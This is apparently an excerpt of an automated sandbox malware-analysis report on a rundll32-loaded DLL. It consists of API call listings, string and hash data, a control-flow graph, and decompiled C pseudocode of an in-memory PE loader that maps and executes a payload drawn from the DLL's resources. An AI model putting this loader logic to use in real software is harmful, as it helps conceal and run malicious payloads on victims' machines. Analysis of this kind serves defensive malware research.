                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035B9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035BD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035C1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035C5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035C9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035CD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035D1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035D5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035D9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035DD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035E1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035E5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035E9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035ED
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035F1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035F5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035F9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100035FD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003601
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003605
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003609
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000360D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003611
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003615
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003619
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000361D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003621
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003625
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003629
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000362D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003631
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003635
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003639
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000363D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003641
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003645
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003649
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000364D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003651
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003655
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003659
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000365D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003661
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003665
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003669
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000366D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003671
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003675
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003679
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000367D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003681
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003685
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003689
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000368D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003691
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003695
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003699
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000369D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036A1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036A5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036A9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036AD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036B1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036B5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036B9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036BD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036C1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036C5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036C9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036CD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036D1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036D5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036D9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036DD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036E1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036E5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036E9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036ED
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036F1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036F5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036F9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100036FD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003701
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003705
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003709
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000370D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003711
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003715
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003719
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000371D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003721
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003725
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003729
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000372D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003731
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003735
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003739
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000373D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003741
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003745
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003749
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000374D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003751
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003755
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003759
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000375D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003761
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003765
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003769
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000376D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003771
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003775
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003779
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000377D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003781
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003785
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003789
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000378D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003791
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003795
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003799
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000379D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100037A1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100037A5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100037A9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100037AD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100037B1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100037B5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100037B9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100037BD
                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 100037ED
                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 10003811
                                                                                                                                • LdrFindResource_U.NTDLL(10000000,?,00000003,?), ref: 10003829
                                                                                                                                • LdrAccessResource.NTDLL(10000000,?,?,?), ref: 10003847
                                                                                                                                • WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003852
                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,LdrF), ref: 10003A18
                                                                                                                                  • Part of subcall function 10001140: _malloc.LIBCMT ref: 10001145
                                                                                                                                  • Part of subcall function 10004380: SetLastError.KERNEL32(0000007F,10003A72,00000000,RunDLL,00000000,?), ref: 10004398
                                                                                                                                • MessageBoxA.USER32 ref: 10003A7E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ShowWindow$AddressProc$AccessAllocErrorFileFindGatherLastLibraryLoadMessageResourceResource_String_base::_VirtualWriteXlen_malloc_memcpy_sstd::_
                                                                                                                                • String ID: Acces$G1B3gZ@zq*H_ZfAmhTkSeVF4VAg4Pd2B%miXGSaKK>>k+Xyaiws&v#d4$Ldr$LdrF$Resour$RunDLL$ce_U$ind$ntdll.dll$sResource
                                                                                                                                • API String ID: 894442030-981497486
                                                                                                                                • Opcode ID: 06627a21cefcd0322741afa9ebed65870638654152089ea2144465a4c1822c5f
                                                                                                                                • Instruction ID: 09a5df61a2497c4bcd01f91edf697d9a35d61914d034a06374251100db5221de
                                                                                                                                • Opcode Fuzzy Hash: 06627a21cefcd0322741afa9ebed65870638654152089ea2144465a4c1822c5f
                                                                                                                                • Instruction Fuzzy Hash: EEF275E1C0436C7EF131AB764CC9EAF6E9CDE446E8B406D1AB18E451029E39DD44CEB2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10004500, Relevance: 15.2, APIs: 10, Instructions: 250COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 138 10004500-1000451c call 10003d80 141 10004527-10004534 138->141 142 1000451e-10004524 138->142 143 100045d4-100045e8 SetLastError 141->143 144 1000453a-1000454e call 10003d80 141->144 147 10004760-10004769 144->147 148 10004554-1000455f 144->148 148->143 149 10004561-1000456a 148->149 149->143 150 1000456c-10004572 149->150 150->143 151 10004574-10004582 150->151 152 10004584-10004589 151->152 153 100045ad-100045d2 GetNativeSystemInfo 151->153 155 10004590-10004597 152->155 153->143 154 100045eb-10004603 VirtualAlloc 153->154 156 10004605-10004614 VirtualAlloc 154->156 157 10004616-1000462b GetProcessHeap HeapAlloc 154->157 158 10004599-1000459b 155->158 159 1000459d 155->159 156->157 160 1000463a-1000464b SetLastError 156->160 161 1000462d-10004634 VirtualFree 157->161 162 1000464e-10004695 call 10003d80 157->162 163 1000459f-100045a1 158->163 159->163 161->160 168 10004756-1000475b call 10004470 162->168 169 1000469b-100046de VirtualAlloc call 10003c80 call 10003da0 162->169 165 100045a3 163->165 166 100045a5-100045ab 163->166 165->166 166->153 166->155 168->147 169->168 175 100046e0-100046e8 169->175 176 100046fa 175->176 177 100046ea-100046f8 call 10004110 175->177 179 10004701-1000470d call 100041a0 176->179 177->179 179->168 183 1000470f-10004714 call 10003f80 179->183 185 10004719-1000471b 183->185 185->168 186 1000471d-10004729 call 100040d0 185->186 186->168 189 1000472b-10004732 186->189 190 10004790-100047a0 189->190 191 10004734-10004738 189->191 192 1000473a-10004749 191->192 193 1000477f-1000478d 191->193 195 1000474b-10004750 SetLastError 192->195 196 1000476c-1000477c 192->196 195->168
                                                                                                                                C-Code - Quality: 89%
                                                                                                                                			E10004500(intOrPtr __ecx) {
				void* _t62;
				signed int _t68;
				signed int _t70;
				void* _t71;
				long _t73;
				void* _t81;
				intOrPtr _t84;
				intOrPtr _t92;
				void* _t101;
				intOrPtr _t102;
				void* _t103;
				intOrPtr* _t105;
				signed char _t108;
				void* _t110;
				void* _t111;
				void* _t120;
				intOrPtr _t122;
				intOrPtr _t131;
				intOrPtr* _t137;
				intOrPtr _t146;
				intOrPtr* _t149;
				long _t152;
				long _t153;
				signed int _t154;
				void* _t155;
				void* _t156;
				void* _t158;

				_t147 =  *((intOrPtr*)(_t158 + 0x3c));
				 *((intOrPtr*)(_t158 + 0x14)) = __ecx;
				_t155 = 0;
				_t62 = E10003D80( *((intOrPtr*)(_t158 + 0x3c)), 0x40);
				if(_t62 != 0) {
					_t105 =  *((intOrPtr*)(_t158 + 0x3c));
					if( *_t105 != 0x5a4d) {
						L16:
						SetLastError(0xc1);
						return 0;
					} else {
						if(E10003D80(_t147,  *((intOrPtr*)(_t105 + 0x3c)) + 0xf8) == 0) {
							L35:
							return 0;
						} else {
							_t149 =  *((intOrPtr*)(_t105 + 0x3c)) + _t105;
							if( *_t149 != 0x4550 ||  *((intOrPtr*)(_t149 + 4)) != 0x14c) {
								goto L16;
							} else {
								_t108 =  *(_t149 + 0x38);
								if((_t108 & 0x00000001) != 0) {
									goto L16;
								} else {
									_t120 = ( *(_t149 + 0x14) & 0x0000ffff) + _t149 + 0x18;
									_t68 =  *(_t149 + 6) & 0x0000ffff;
									if(_t68 > 0) {
										_t137 = _t120 + 0xc;
										_t154 = _t68;
										do {
											_t146 =  *((intOrPtr*)(_t137 + 4));
											_t102 =  *_t137;
											if(_t146 != 0) {
												_t103 = _t102 + _t146;
											} else {
												_t103 = _t102 + _t108;
											}
											if(_t103 > _t155) {
												_t155 = _t103;
											}
											_t137 = _t137 + 0x28;
											_t154 = _t154 - 1;
										} while (_t154 != 0);
									}
									__imp__GetNativeSystemInfo(_t158 + 0x14); // executed
									_t122 =  *((intOrPtr*)(_t158 + 0x18));
									_t70 =  !(_t122 - 1);
									_t152 =  *((intOrPtr*)(_t149 + 0x50)) + _t122 - 0x00000001 & _t70;
									if(_t152 == (_t122 + _t155 - 0x00000001 & _t70)) {
										_t71 = VirtualAlloc( *(_t149 + 0x34), _t152, 0x3000, 4); // executed
										_t156 = _t71;
										if(_t156 != 0) {
											L19:
											_t73 = HeapAlloc(GetProcessHeap(), 8, 0x34);
											_t153 = _t73;
											if(_t153 != 0) {
												 *(_t153 + 4) = _t156;
												 *((intOrPtr*)(_t153 + 0x1c)) =  *((intOrPtr*)(_t158 + 0x44));
												 *(_t153 + 0x14) = ( *(_t149 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
												 *((intOrPtr*)(_t153 + 0x28)) =  *((intOrPtr*)(_t158 + 0x50));
												 *((intOrPtr*)(_t153 + 0x20)) =  *((intOrPtr*)(_t158 + 0x48));
												 *((intOrPtr*)(_t153 + 0x24)) =  *((intOrPtr*)(_t158 + 0x4c));
												 *((intOrPtr*)(_t153 + 0x30)) =  *((intOrPtr*)(_t158 + 0x18));
												if(E10003D80( *((intOrPtr*)(_t158 + 0x40)),  *(_t149 + 0x54)) == 0) {
													L34:
													E10004470(_t153);
													goto L35;
												} else {
													_t81 = VirtualAlloc(_t156,  *(_t149 + 0x54), 0x1000, 4); // executed
													_t110 = _t81;
													E10003C80(_t110,  *((intOrPtr*)(_t158 + 0x3c)),  *(_t149 + 0x54));
													_t84 =  *((intOrPtr*)(_t158 + 0x48));
													_t131 =  *((intOrPtr*)(_t158 + 0x4c));
													_t158 = _t158 + 0xc;
													_t111 = _t110 +  *((intOrPtr*)(_t84 + 0x3c));
													 *_t153 = _t111;
													 *(_t111 + 0x34) = _t156;
													if(E10003DA0( *((intOrPtr*)(_t158 + 0x1c)), _t84, _t131, _t149, _t153) == 0) {
														goto L34;
													} else {
														_t87 =  *((intOrPtr*)( *_t153 + 0x34)) ==  *(_t149 + 0x34);
														if( *((intOrPtr*)( *_t153 + 0x34)) ==  *(_t149 + 0x34)) {
															 *((intOrPtr*)(_t153 + 0x18)) = 1;
														} else {
															 *((intOrPtr*)(_t153 + 0x18)) = E10004110(_t153, _t87);
														}
														if(E100041A0(_t153) == 0) {
															goto L34;
														} else {
															_push(_t153);
															if(E10003F80( *((intOrPtr*)(_t158 + 0x10))) == 0 || E100040D0(_t153) == 0) {
																goto L34;
															} else {
																_t92 =  *((intOrPtr*)( *_t153 + 0x28));
																if(_t92 == 0) {
																	 *((intOrPtr*)(_t153 + 0x2c)) = 0;
																	return _t153;
																} else {
																	if( *(_t153 + 0x14) == 0) {
																		 *((intOrPtr*)(_t153 + 0x2c)) = _t92 + _t156;
																		return _t153;
																	} else {
																		_push(0);
																		_push(1);
																		_push(0x10000000);
																		if( *((intOrPtr*)(_t156 + _t92))() != 0) {
																			 *((intOrPtr*)(_t153 + 0x10)) = 1;
																			return _t153;
																		} else {
																			SetLastError(0x45a);
																			goto L34;
																		}
																	}
																}
															}
														}
													}
												}
											} else {
												VirtualFree(_t156, _t73, 0x8000);
												goto L21;
											}
										} else {
											_t101 = VirtualAlloc(_t71, _t152, 0x3000, 4); // executed
											_t156 = _t101;
											if(_t156 == 0) {
												L21:
												SetLastError(0xe);
												return 0;
											} else {
												goto L19;
											}
										}
									} else {
										goto L16;
									}
								}
							}
						}
					}
				} else {
					return _t62;
				}
			}






























                                                                                                                                0x10004506
                                                                                                                                0x1000450f
                                                                                                                                0x10004513
                                                                                                                                0x10004515
                                                                                                                                0x1000451c
                                                                                                                                0x10004528
                                                                                                                                0x10004534
                                                                                                                                0x100045d4
                                                                                                                                0x100045d9
                                                                                                                                0x100045e8
                                                                                                                                0x1000453a
                                                                                                                                0x1000454e
                                                                                                                                0x10004760
                                                                                                                                0x10004769
                                                                                                                                0x10004554
                                                                                                                                0x10004557
                                                                                                                                0x1000455f
                                                                                                                                0x00000000
                                                                                                                                0x1000456c
                                                                                                                                0x1000456c
                                                                                                                                0x10004572
                                                                                                                                0x00000000
                                                                                                                                0x10004574
                                                                                                                                0x10004578
                                                                                                                                0x1000457c
                                                                                                                                0x10004582
                                                                                                                                0x10004584
                                                                                                                                0x10004587
                                                                                                                                0x10004590
                                                                                                                                0x10004590
                                                                                                                                0x10004593
                                                                                                                                0x10004597
                                                                                                                                0x1000459d
                                                                                                                                0x10004599
                                                                                                                                0x10004599
                                                                                                                                0x10004599
                                                                                                                                0x100045a1
                                                                                                                                0x100045a3
                                                                                                                                0x100045a3
                                                                                                                                0x100045a5
                                                                                                                                0x100045a8
                                                                                                                                0x100045a8
                                                                                                                                0x10004590
                                                                                                                                0x100045b2
                                                                                                                                0x100045b8
                                                                                                                                0x100045c6
                                                                                                                                0x100045cc
                                                                                                                                0x100045d2
                                                                                                                                0x100045fd
                                                                                                                                0x100045ff
                                                                                                                                0x10004603
                                                                                                                                0x10004616
                                                                                                                                0x10004621
                                                                                                                                0x10004627
                                                                                                                                0x1000462b
                                                                                                                                0x10004656
                                                                                                                                0x10004663
                                                                                                                                0x1000466a
                                                                                                                                0x10004671
                                                                                                                                0x10004678
                                                                                                                                0x1000467b
                                                                                                                                0x10004682
                                                                                                                                0x10004695
                                                                                                                                0x10004756
                                                                                                                                0x1000475b
                                                                                                                                0x00000000
                                                                                                                                0x1000469b
                                                                                                                                0x100046a7
                                                                                                                                0x100046ad
                                                                                                                                0x100046b5
                                                                                                                                0x100046ba
                                                                                                                                0x100046c1
                                                                                                                                0x100046c5
                                                                                                                                0x100046ca
                                                                                                                                0x100046d1
                                                                                                                                0x100046d4
                                                                                                                                0x100046de
                                                                                                                                0x00000000
                                                                                                                                0x100046e0
                                                                                                                                0x100046e5
                                                                                                                                0x100046e8
                                                                                                                                0x100046fa
                                                                                                                                0x100046ea
                                                                                                                                0x100046f5
                                                                                                                                0x100046f5
                                                                                                                                0x1000470d
                                                                                                                                0x00000000
                                                                                                                                0x1000470f
                                                                                                                                0x10004713
                                                                                                                                0x1000471b
                                                                                                                                0x00000000
                                                                                                                                0x1000472b
                                                                                                                                0x1000472d
                                                                                                                                0x10004732
                                                                                                                                0x10004792
                                                                                                                                0x100047a0
                                                                                                                                0x10004734
                                                                                                                                0x10004738
                                                                                                                                0x10004782
                                                                                                                                0x1000478d
                                                                                                                                0x1000473a
                                                                                                                                0x1000473a
                                                                                                                                0x1000473c
                                                                                                                                0x10004740
                                                                                                                                0x10004749
                                                                                                                                0x1000476e
                                                                                                                                0x1000477c
                                                                                                                                0x1000474b
                                                                                                                                0x10004750
                                                                                                                                0x00000000
                                                                                                                                0x10004750
                                                                                                                                0x10004749
                                                                                                                                0x10004738
                                                                                                                                0x10004732
                                                                                                                                0x1000471b
                                                                                                                                0x1000470d
                                                                                                                                0x100046de
                                                                                                                                0x1000462d
                                                                                                                                0x10004634
                                                                                                                                0x00000000
                                                                                                                                0x10004634
                                                                                                                                0x10004605
                                                                                                                                0x1000460e
                                                                                                                                0x10004610
                                                                                                                                0x10004614
                                                                                                                                0x1000463a
                                                                                                                                0x1000463c
                                                                                                                                0x1000464b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10004614
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x100045d2
                                                                                                                                0x10004572
                                                                                                                                0x1000455f
                                                                                                                                0x1000454e
                                                                                                                                0x10004524
                                                                                                                                0x10004524
                                                                                                                                0x10004524

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10003D80: SetLastError.KERNEL32(0000000D,1000451A,?,00000040,00000010,00000000,0000000F,100047D0,?,00000000,10004340,10004350,10004370,00000000,10003A63,00000000), ref: 10003D8C
